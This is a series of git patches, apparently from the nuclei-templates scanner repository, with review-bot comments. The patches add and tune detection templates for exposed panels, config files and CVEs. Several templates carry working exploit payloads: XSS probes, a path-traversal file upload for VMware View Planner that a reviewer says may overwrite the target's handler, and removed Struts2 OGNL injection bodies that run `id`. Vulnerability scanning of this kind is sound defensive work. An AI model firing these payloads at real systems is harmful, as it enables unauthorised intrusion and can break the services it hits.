From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 20:53:55 +0530 Subject: [PATCH 243/370] improved matcher --- cves/2019/CVE-2019-5127.yaml | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/cves/2019/CVE-2019-5127.yaml b/cves/2019/CVE-2019-5127.yaml index be37d16bbc..eaa1499e56 100644 --- a/cves/2019/CVE-2019-5127.yaml +++ b/cves/2019/CVE-2019-5127.yaml @@ -23,12 +23,19 @@ requests: matchers-condition: and matchers: - - type: regex - regex: - - "uid(.*)" - - "gid(.*)" - part: body + - type: word + words: + - "uid=" + - "gid=" + - "groups=" condition: and + part: body + + - type: word + words: + - text/plain + part: header + - type: status status: - 200 From e71bba4cf47f2a28e833c5324d36fdeb19ba56a9 Mon Sep 17 00:00:00 2001 From: oppsec <50470310+oppsec@users.noreply.github.com> Date: Thu, 4 Mar 2021 13:00:06 -0300 Subject: [PATCH 244/370] Create joomla-config-file.yaml --- exposures/files/joomla-config-file.yaml | 30 +++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 exposures/files/joomla-config-file.yaml diff --git a/exposures/files/joomla-config-file.yaml b/exposures/files/joomla-config-file.yaml new file mode 100644 index 0000000000..6ae2bbc14a --- /dev/null +++ b/exposures/files/joomla-config-file.yaml @@ -0,0 +1,30 @@ +id: joomla-config-dist-file + +info: + name: Joomla Config Dist File + author: oppsec + severity: low + description: configuration.php-dist is a file created by Joomla to save Joomla settings. + +requests: + - method: GET + path: + - "{{BaseURL}}/configuration.php-dist" + + matchers-condition: and + matchers: + - type: word + words: + - "Joomla" + - "JConfig" + - "@package" + condition: and + + - type: word + words: + - "text/plain" + part: header + + - type: status + status: + - 200 From 04cc9c44fb074ead714e11a4d56b8995fda35291 Mon Sep 17 00:00:00 2001 
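Review bot: In the new `joomla-config-file.yaml` the template `id` is `joomla-config-dist-file` while the file is named `joomla-config-file.yaml`; the convention on this page is id == filename (`hmc-hybris-panel`, `blue-iris-login`), so one of the two should be renamed. The description says `configuration.php-dist` "is a file created by Joomla to save Joomla settings" — as far as I know it is the sample configuration template shipped with the Joomla source rather than the live `configuration.php`, so the `low` severity is right but the wording overstates what is exposed; I would write `description: configuration.php-dist is the sample configuration template shipped with Joomla; its presence reveals the install layout, not live settings.` `tags:` is also missing from `info`.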
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 21:32:34 +0530 Subject: [PATCH 245/370] xss matchers update --- cves/2019/CVE-2019-7219.yaml | 4 ++-- cves/2020/CVE-2020-1943.yaml | 4 ++-- vulnerabilities/other/discourse-xss.yaml | 4 ++-- 3 files changed, 6 insertions(+), 6 deletions(-) diff --git a/cves/2019/CVE-2019-7219.yaml b/cves/2019/CVE-2019-7219.yaml index a8cd8101f0..388fa44735 100644 --- a/cves/2019/CVE-2019-7219.yaml +++ b/cves/2019/CVE-2019-7219.yaml @@ -9,14 +9,14 @@ info: requests: - method: GET path: - - "{{BaseURL}}/webapp/?fccc0\">5f43d=1" + - '{{BaseURL}}/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(xss)%3E' matchers-condition: and matchers: - type: word part: body words: - - "\">" + - "" - type: word part: header words: diff --git a/cves/2020/CVE-2020-1943.yaml b/cves/2020/CVE-2020-1943.yaml index e23b19c19f..33eb610341 100644 --- a/cves/2020/CVE-2020-1943.yaml +++ b/cves/2020/CVE-2020-1943.yaml @@ -9,13 +9,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/control/stream?contentId=' + - '{{BaseURL}}/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(xss)%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/vulnerabilities/other/discourse-xss.yaml b/vulnerabilities/other/discourse-xss.yaml index 08b3f7c10f..1ba1c7ef63 100644 --- a/vulnerabilities/other/discourse-xss.yaml +++ b/vulnerabilities/other/discourse-xss.yaml @@ -10,7 +10,7 @@ info: requests: - method: GET path: - - '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(1337)%3E' + - '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(xss)%3E' matchers-condition: and matchers: - type: status @@ -19,7 +19,7 @@ requests: - type: word words: - - "" + - "" part: body - type: word From 3a2d49657441a4d2d84efb4b3d29655f47756b3f Mon Sep 17 00:00:00 2001 
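Review bot: The new `CVE-2019-7219` payload keeps a raw `\` in the query string (`%27\%22%3E...`); some servers and proxies normalize a bare backslash in the request target, and the reflected text then no longer contains the exact byte sequence the body matcher expects, so encoding it as `%5C` is safer and matches what the other two templates in this commit send. The body matcher value renders as an empty string here (`- ""`), presumably because the `<svg/onload=alert(xss)>` text was stripped by the page renderer; please confirm the committed matcher holds the decoded payload verbatim, since an empty word would match every page with the right content type. The `part: header` matcher continues past the end of the hunk.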
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 22:20:57 +0530 Subject: [PATCH 246/370] improved matcher --- cves/2020/CVE-2020-13937.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-13937.yaml b/cves/2020/CVE-2020-13937.yaml index dc69730ad9..bb7e362009 100644 --- a/cves/2020/CVE-2020-13937.yaml +++ b/cves/2020/CVE-2020-13937.yaml @@ -29,13 +29,15 @@ requests: - type: status status: - 200 + - type: word words: - "application/json" - condition: and part: header + - type: word words: - - "config" + - config + - kylin.metadata.url condition: and part: body From e082b8ee1f3d5311df9e60b9e3ad7ed9bdbad252 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 4 Mar 2021 23:56:06 +0700 Subject: [PATCH 247/370] =?UTF-8?q?Typo=20reference=20=F0=9F=A4=A6?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2020/CVE-2020-13937.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-13937.yaml b/cves/2020/CVE-2020-13937.yaml index bb7e362009..4cd9ad78e4 100644 --- a/cves/2020/CVE-2020-13937.yaml +++ b/cves/2020/CVE-2020-13937.yaml @@ -11,7 +11,7 @@ info: 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed Kylin's configuration information without any authentication, so it is dangerous because some confidential information entries will be disclosed to everyone. - reference: ttps://nvd.nist.gov/vuln/detail/CVE-2020-13937 + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-13937 tags: cve,cve2020,apache # References: From 06f67cdbfca701a4b8275c9325b9486264522f60 Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 22:29:42 +0530 Subject: [PATCH 248/370] moving files around --- exposures/{files => configs}/joomla-config-file.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposures/{files => configs}/joomla-config-file.yaml (100%) diff --git a/exposures/files/joomla-config-file.yaml b/exposures/configs/joomla-config-file.yaml similarity index 100% rename from exposures/files/joomla-config-file.yaml rename to exposures/configs/joomla-config-file.yaml From 1a4bd524ce10440498ba7a5ce656ed5650f259e5 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 5 Mar 2021 00:10:33 +0700 Subject: [PATCH 249/370] =?UTF-8?q?Delete=20matchers=20config=20?= =?UTF-8?q?=F0=9F=94=A8?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2020/CVE-2020-13937.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2020/CVE-2020-13937.yaml b/cves/2020/CVE-2020-13937.yaml index 4cd9ad78e4..1dde372bb1 100644 --- a/cves/2020/CVE-2020-13937.yaml +++ b/cves/2020/CVE-2020-13937.yaml @@ -37,7 +37,6 @@ requests: - type: word words: - - config - kylin.metadata.url condition: and part: body From 93c170e3c40ff2f27a7c4e80ca33ce2b1e9c1a07 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Mar 2021 17:20:11 +0000 Subject: [PATCH 250/370] Auto Update README [Thu Mar 4 17:20:11 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 33cccc42c2..82d6b5e71c 100644 --- a/README.md +++ b/README.md 
@@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 221 | vulnerabilities | 105 | exposed-panels | 95 | -| exposures | 59 | technologies | 50 | misconfiguration | 50 | +| exposures | 60 | technologies | 50 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 17 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**69 directories, 671 files**. +**69 directories, 672 files**. From 65037ba558a60779d5f7ade88b15c6ebf725c3c3 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 22:50:32 +0530 Subject: [PATCH 251/370] Update CVE-2020-13937.yaml --- cves/2020/CVE-2020-13937.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2020/CVE-2020-13937.yaml b/cves/2020/CVE-2020-13937.yaml index 1dde372bb1..4cd9ad78e4 100644 --- a/cves/2020/CVE-2020-13937.yaml +++ b/cves/2020/CVE-2020-13937.yaml @@ -37,6 +37,7 @@ requests: - type: word words: + - config - kylin.metadata.url condition: and part: body From 99f30958383ef876abe2572a3ae18befdf38ae18 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Mar 2021 01:59:41 +0530 Subject: [PATCH 252/370] Create advance-setup.yaml --- exposed-panels/advance-setup.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/advance-setup.yaml diff --git a/exposed-panels/advance-setup.yaml b/exposed-panels/advance-setup.yaml new file mode 100644 index 0000000000..b8a4fa5b54 --- /dev/null +++ b/exposed-panels/advance-setup.yaml 
@@ -0,0 +1,22 @@ +id: advance-setup-login + +info: + name: Advance Setup Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6819 + +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/cgi-bin/webcm?getpage=../html/login.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'Advanced Setup - Security - Admin User Name & Password' + - type: status + status: + - 200 From 3024a5142c4627599149e3ec414601c20bce7c16 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Mar 2021 02:00:05 +0530 Subject: [PATCH 253/370] Create blue-iris-login.yaml --- exposed-panels/blue-iris-login.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/blue-iris-login.yaml diff --git a/exposed-panels/blue-iris-login.yaml b/exposed-panels/blue-iris-login.yaml new file mode 100644 index 0000000000..de085c8d45 --- /dev/null +++ b/exposed-panels/blue-iris-login.yaml @@ -0,0 +1,21 @@ +id: blue-iris-login + +info: + name: Blue Iris Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6814 + +requests: + - method: GET + path: + - '{{BaseURL}}/login.htm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Blue Iris Login' + - type: status + status: + - 200 From 9e8bc5d17775c7133e9fcc61002b125b16cb37f8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Mar 2021 02:00:31 +0530 Subject: [PATCH 254/370] Create keenetic-web-login.yaml --- exposed-panels/keenetic-web-login.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/keenetic-web-login.yaml diff --git a/exposed-panels/keenetic-web-login.yaml b/exposed-panels/keenetic-web-login.yaml new file mode 100644 index 0000000000..7f68b943f3 --- /dev/null +++ b/exposed-panels/keenetic-web-login.yaml 
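Review bot: `id: advance-setup-login` does not match the filename `exposed-panels/advance-setup.yaml`, unlike the sibling templates in this batch (`blue-iris-login.yaml` ↔ `blue-iris-login`); rename one of them so the id stays discoverable. The first path is the bare `'{{BaseURL}}'`, so every target root receives an extra request only to search for the `Advanced Setup - Security - Admin User Name & Password` string; if the intent is the `/cgi-bin/webcm?getpage=../html/login.html` page, dropping the root path halves the traffic without losing coverage. `info` has no `tags:` entry.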
@@ -0,0 +1,21 @@ +id: keenetic-web-login + +info: + name: Keenetic Web Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6817 + +requests: + - method: GET + path: + - '{{BaseURL}}/login#goto=%2Fdashboard' + + matchers-condition: and + matchers: + - type: word + words: + - 'Keenetic Web' + - type: status + status: + - 200 From fb8ede7df433f64aa16e0f8c96f53e8c3da2af30 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Mar 2021 02:01:27 +0530 Subject: [PATCH 255/370] Create remote-ui-login.yaml --- exposed-panels/remote-ui-login.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/remote-ui-login.yaml diff --git a/exposed-panels/remote-ui-login.yaml b/exposed-panels/remote-ui-login.yaml new file mode 100644 index 0000000000..2987e33b23 --- /dev/null +++ b/exposed-panels/remote-ui-login.yaml @@ -0,0 +1,21 @@ +id: remote-ui-login + +info: + name: Remote UI Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6815 + +requests: + - method: GET + path: + - '{{BaseURL}}/login.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'System Manager ID:' + - type: status + status: + - 200 From ec00f004a34b8fd2bfc0ea5a866e803db9e24ba2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Mar 2021 02:09:35 +0530 Subject: [PATCH 256/370] Create cisco-integrated-login.yaml --- exposed-panels/cisco-integrated-login.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/cisco-integrated-login.yaml diff --git a/exposed-panels/cisco-integrated-login.yaml b/exposed-panels/cisco-integrated-login.yaml new file mode 100644 index 0000000000..b075e29973 --- /dev/null +++ b/exposed-panels/cisco-integrated-login.yaml 
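Review bot: The `keenetic-web-login` request path `'{{BaseURL}}/login#goto=%2Fdashboard'` carries a URL fragment; fragments are client-side only and are never part of what an HTTP server receives, so either the client strips it and `#goto=...` is dead text, or it is sent literally and the request line is non-standard. Use `'{{BaseURL}}/login'` unless the server is known to require the suffix. The `Keenetic Web` word match gated by `status: 200` is otherwise reasonable, though a `tags:` entry is missing as in the neighbouring templates.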
@@ -0,0 +1,21 @@ +id: cisco-integrated-login + +info: + name: Cisco Integrated Management Controller Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/3859 + +requests: + - method: GET + path: + - '{{BaseURL}}/login.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'Cisco Integrated Management Controller Login' + - type: status + status: + - 200 From 7a57776609828dc6fd46101c66a91f99bf7eb2ca Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 5 Mar 2021 11:00:14 +0530 Subject: [PATCH 257/370] Update advance-setup.yaml --- exposed-panels/advance-setup.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposed-panels/advance-setup.yaml b/exposed-panels/advance-setup.yaml index b8a4fa5b54..f2a2600f5d 100644 --- a/exposed-panels/advance-setup.yaml +++ b/exposed-panels/advance-setup.yaml @@ -9,7 +9,6 @@ info: requests: - method: GET path: - - '{{BaseURL}}' - '{{BaseURL}}/cgi-bin/webcm?getpage=../html/login.html' matchers-condition: and From d968939968218b30c3f5928499583453f1b78c0e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 5 Mar 2021 05:30:55 +0000 Subject: [PATCH 258/370] Auto Update README [Fri Mar 5 05:30:55 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 82d6b5e71c..bb249da855 100644 --- a/README.md +++ b/README.md 
@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 221 | vulnerabilities | 105 | exposed-panels | 95 | +| cves | 221 | vulnerabilities | 105 | exposed-panels | 100 | | exposures | 60 | technologies | 50 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 17 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**69 directories, 672 files**. +**69 directories, 677 files**. From b2e4914f9849ac2961191b61aa90a508c1d2201c Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Fri, 5 Mar 2021 15:27:05 +0700 Subject: [PATCH 259/370] :fire: Add CVE-2021-21978 --- cves/2021/CVE-2021-21978.yaml | 44 +++++++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 cves/2021/CVE-2021-21978.yaml diff --git a/cves/2021/CVE-2021-21978.yaml b/cves/2021/CVE-2021-21978.yaml new file mode 100644 index 0000000000..1898303c2e --- /dev/null +++ b/cves/2021/CVE-2021-21978.yaml 
@@ -0,0 +1,44 @@ +id: CVE-2021-21978 + +info: + name: VMware View Planner Unauthenticated RCE + author: dwisiswant0 + severity: critical + reference: https://twitter.com/osama_hroot/status/1367258907601698816 + description: | + This template detects an VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability. + Improper input validation and lack of authorization leading to arbitrary file upload in logupload web application. + An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted + file leading to remote code execution within the logupload container. + tags: cve,cve2021,vmware,rce + +requests: + - raw: + - | + POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS + Accept: text/html + Referer: {{BaseURL}} + Connection: close + + ------WebKitFormBoundarySHHbUsfCoxlX1bpS + Content-Disposition: form-data; name="logfile"; filename="" + Content-Type: text/plain + + POC_TEST + + ------WebKitFormBoundarySHHbUsfCoxlX1bpS + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "File uploaded successfully." + part: body + - type: dsl + dsl: + - "len(body) == 28" # lenght of "\nFile uploaded successfully." \ No newline at end of file From df24aca916b3e31249046d41fcf3973f3c70922e Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Fri, 5 Mar 2021 15:29:13 +0700 Subject: [PATCH 260/370] :pencil2: Fix misspelling of 'image' in content-type --- cves/2021/CVE-2021-3378.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-3378.yaml b/cves/2021/CVE-2021-3378.yaml index 4829a293a3..f39c826555 100644 
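Review bot: The `logMetaData` query string decodes to `itrLogPath` = `../../../../../../etc/httpd/html/wsgi_log_upload` and `logFileType` = `log_upload_wsgi.py`, so if the server builds the destination from those two fields as the description's "arbitrary file upload" wording implies, this probe overwrites the application's own WSGI handler with the string `POC_TEST` — a destructive write that likely leaves the target's upload service broken after the scan. A detection template should target a harmless, unique filename instead, e.g. `"logFileType": "nuclei-check.txt"` URL-encoded in the query (or a per-scan random name), or stop short of writing at all if the response can confirm the traversal. The trailing `dsl` matcher `len(body) == 28` is also brittle: it pins detection to an exact byte count that a changed trailing newline would break, while the `File uploaded successfully.` word match already identifies the response, so the length check can be dropped. The comment on that line misspells `length`.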
--- a/cves/2021/CVE-2021-3378.yaml +++ b/cves/2021/CVE-2021-3378.yaml @@ -24,7 +24,7 @@ requests: ------WebKitFormBoundarySHHbUsfCoxlX1bpS Content-Disposition: form-data; name="file"; filename="poc.txt" - Content-Type: imnage/png + Content-Type: image/png POC_TEST From c7aa1e5b1202e95c803d83d044fbbe46449565c9 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 5 Mar 2021 17:40:42 +0530 Subject: [PATCH 261/370] Delete CVE-2020-14815.yaml Removing this template as it's can't be detected accurately. --- cves/2020/CVE-2020-14815.yaml | 27 --------------------------- 1 file changed, 27 deletions(-) delete mode 100644 cves/2020/CVE-2020-14815.yaml diff --git a/cves/2020/CVE-2020-14815.yaml b/cves/2020/CVE-2020-14815.yaml deleted file mode 100644 index 1f227cef61..0000000000 --- a/cves/2020/CVE-2020-14815.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2020-14815 - -info: - name: Oracle Business Intelligence XSS - author: pikpikcu - severity: medium - reference: https://www.oracle.com/security-alerts/cpuoct2020.html - tags: cve,cve2020,oracle,xss - source: https://twitter.com/HackerOn2Wheels/status/1326927875279380480 - -requests: - - method: GET - path: - - "{{BaseURL}}/bi-security-login/login.jsp?msi=false&redirect=%22%3E%3Cimg/src/onerror%3dalert(document.domain)%3E" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "X-Oracle-Dms-Ecid:" - - "X-Oracle-Dms-Rid:" - - "Set-Cookie:" - part: header - condition: and \ No newline at end of file From 299f327e9a3c02303935b2f18c02d5d24768b056 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 5 Mar 2021 12:14:59 +0000 Subject: [PATCH 262/370] Auto Update README [Fri Mar 5 12:14:59 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index bb249da855..27033a9b37 100644 --- a/README.md +++ b/README.md 
@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 221 | vulnerabilities | 105 | exposed-panels | 100 | +| cves | 220 | vulnerabilities | 105 | exposed-panels | 100 | | exposures | 60 | technologies | 50 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 17 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**69 directories, 677 files**. +**69 directories, 676 files**. From 3249f7f6ca9edbf95c939d6c54e78eeecbdeaf2c Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 5 Mar 2021 14:38:39 +0000 Subject: [PATCH 263/370] =?UTF-8?q?=F0=9F=93=9D=20CVE-2019-0221?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2019/CVE-2019-0221.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 cves/2019/CVE-2019-0221.yaml diff --git a/cves/2019/CVE-2019-0221.yaml b/cves/2019/CVE-2019-0221.yaml new file mode 100644 index 0000000000..a14d2acc9a --- /dev/null +++ b/cves/2019/CVE-2019-0221.yaml 
@@ -0,0 +1,30 @@ +id: CVE-2019-0221 + +info: + name: Apache Tomcat XSS + author: pikpikcu + severity: low + reference: https://nvd.nist.gov/vuln/detail/CVE-2019-0221 + description: | + The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and + 7.0.0 to 7.0.93 echoes user provided data without escaping and is, + therefore, vulnerable to XSS. SSI is disabled by default. + The printenv command is intended for debugging and is unlikely to be present in a production website. + tags: cve, cve2019,apache,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E" + + matchers-condition: and + matchers: + + - type: word + words: + - "" + condition: and + + - type: status + status: + - 200 From cc641d9946e986ef23e9410c01f9551f28ec5a54 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 6 Mar 2021 02:09:54 +0530 Subject: [PATCH 264/370] removing few templates --- cves/2007/CVE-2007-4556.yaml | 2 +- cves/2012/CVE-2012-0392.yaml | 3 +-- cves/2012/CVE-2012-0838.yaml | 31 ------------------------------- cves/2013/CVE-2013-1965.yaml | 1 - cves/2013/CVE-2013-1966.yaml | 32 -------------------------------- cves/2013/CVE-2013-2134.yaml | 32 -------------------------------- cves/2013/CVE-2013-2135.yaml | 25 ------------------------- cves/2017/CVE-2017-12611.yaml | 3 +-- cves/2018/CVE-2018-11776.yaml | 3 +-- 9 files changed, 4 insertions(+), 128 deletions(-) delete mode 100644 cves/2012/CVE-2012-0838.yaml delete mode 100644 cves/2013/CVE-2013-1966.yaml delete mode 100644 cves/2013/CVE-2013-2134.yaml delete mode 100644 cves/2013/CVE-2013-2135.yaml diff --git a/cves/2007/CVE-2007-4556.yaml b/cves/2007/CVE-2007-4556.yaml index ba0fb52f99..0d3b5af374 100644 --- a/cves/2007/CVE-2007-4556.yaml +++ b/cves/2007/CVE-2007-4556.yaml @@ -22,7 +22,7 @@ requests: - type: regex regex: - "root:[x*]:0:0" - condition: and + part: body - type: status status: 
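Review bot: As rendered here the only entry under `words:` in the CVE-2019-0221 hunk is the empty string `""`, and an empty string is contained in every body, so together with `status: 200` this template flags any host that answers `/printenv.shtml` with a 200 (catch-all pages included) whether or not SSI or the XSS exists. If the listing stripped the `<script>alert('xss')</script>` payload, the intended line is `- "<script>alert('xss')</script>"` and should be confirmed in the committed file; either way `condition: and` on a single-entry list is a no-op. A reflection check should also require the payload to come back unencoded — `part: body` with the exact payload plus a negative matcher on its escaped form `&lt;script&gt;` — otherwise a server that HTML-encodes the query string is reported as vulnerable.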
diff --git a/cves/2012/CVE-2012-0392.yaml b/cves/2012/CVE-2012-0392.yaml index 1b40dea9cb..05a2156fae 100644 --- a/cves/2012/CVE-2012-0392.yaml +++ b/cves/2012/CVE-2012-0392.yaml @@ -18,8 +18,7 @@ requests: - type: regex regex: - "root:[x*]:0:0" - condition: and - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/cves/2012/CVE-2012-0838.yaml b/cves/2012/CVE-2012-0838.yaml deleted file mode 100644 index aabf87fb1b..0000000000 --- a/cves/2012/CVE-2012-0838.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2012-0838 - -info: - name: Apache Struts2 S2-007 RCE - author: pikpikcu - severity: critical - reference: https://blog.csdn.net/weixin_43416469/article/details/113849942 - tags: cve,cve2012,apache,struts,rce - -requests: - - method: POST - path: - - "{{BaseURL}}/user.action" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - name=tes&email=tes&age=%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27id%27%29.getInputStream%28%29%29%29+%2B+%27 - - matchers-condition: and - matchers: - - - type: regex - regex: - - "uid(.*)" - - "gid(.*)" - part: body - condition: and - - - type: status - status: - - 200 diff --git a/cves/2013/CVE-2013-1965.yaml b/cves/2013/CVE-2013-1965.yaml index 38a168df56..b39b275ce9 100644 --- a/cves/2013/CVE-2013-1965.yaml +++ b/cves/2013/CVE-2013-1965.yaml @@ -22,7 +22,6 @@ requests: - type: regex regex: - "root:[x*]:0:0" - condition: and - type: status status: diff --git a/cves/2013/CVE-2013-1966.yaml b/cves/2013/CVE-2013-1966.yaml deleted file mode 100644 index 6a4732774f..0000000000 --- a/cves/2013/CVE-2013-1966.yaml +++ /dev/null 
@@ -1,32 +0,0 @@ -id: CVE-2013-1966 - -info: - name: Apache Struts2 S2-013 RCE - author: pikpikcu - severity: critical - reference: https://blog.csdn.net/weixin_43416469/article/details/113636581?utm_medium=distribute.pc_relevant_t0.none-task-blog-OPENSEARCH-1.control&dist_request_id=979f56d5-0937-4e8d-8e1e-79f3a5d24e14&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-OPENSEARCH-1.control - tags: cve,cve2013,apache,rce,struts - -requests: - - method: GET - path: - - 